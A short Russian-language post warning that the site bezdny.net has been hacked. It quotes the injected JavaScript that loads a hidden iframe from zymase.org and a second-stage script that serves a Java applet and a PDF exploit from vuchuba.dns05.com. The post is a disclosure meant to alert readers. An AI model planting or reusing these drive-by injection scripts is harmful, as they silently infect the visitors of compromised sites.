Сайт bezdny.net (аггрегатор «лучшего бездны» сайта bash.im) взломан и пытается просунуть эксплоит, на яве и через уязвимость в pdf.
С недавних пор в конце страницы отдвется вот что:
<script type="text/javascript" language="javascript" > (function(){ var a = document.createElement('iframe'); a.src = 'http://zymase.org/index.php?r=9bb1291'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; a.style.width = '2px'; a.style.left = '1px'; a.style.top = '1px'; if(!document.getElementById('mira')) { document.write('<div id='mira'></div>'); document.getElementById('mira').appendChild(a); }})();</script>
Идем дальше, на zymaze.org. Без referer редиректит на about:blank, а вот с реферером
<script>
if(navigator.javaEnabled()==true){
document.write("<applet width='100%' height='100%' code='site.Attacker.class' archive='http://vuchuba.dns05.com/profile.php?exp=byte&b=1f66e6f&k=fa99dbc4c1ce9aa78c7840b787e75b44'><param name='url' VALUE='http://vuchuba.dns05.com/y41gr.php?exp=byte&b=1f66e6f&k=fa99dbc4c1ce9aa78c7840b787e75b44'></applet>");
};</script>
<script>
function pdfone()
{
document.write("<iframe width='168' height='172' frameborder='1' src='https://vuchuba.dns05.com/profile.php?exp=lib&b=1f66e6f&k=fa99dbc4c1ce9aa78c7840b787e75b44&host=http://vuchuba.dns05.com'></iframe>");
}
function pdftwo()
{
document.write("<iframe width='168' height='172' frameborder='1' src='https://vuchuba.dns05.com/profile.php?exp=lib&b=1f66e6f&k=fa99dbc4c1ce9aa78c7840b787e75b44&host=http://vuchuba.dns05.com'></iframe>");
}
var roman = navigator.userAgent.toLowerCase();
if(navigator.javaEnabled()==false){
if(roman.indexOf('msie') != -1){ setTimeout(pdfone, 0); }
else { setTimeout(pdftwo, 0); };};</script>
Дальше ковыряться не стал. Будьте бдительны.
Автор: 6opoga
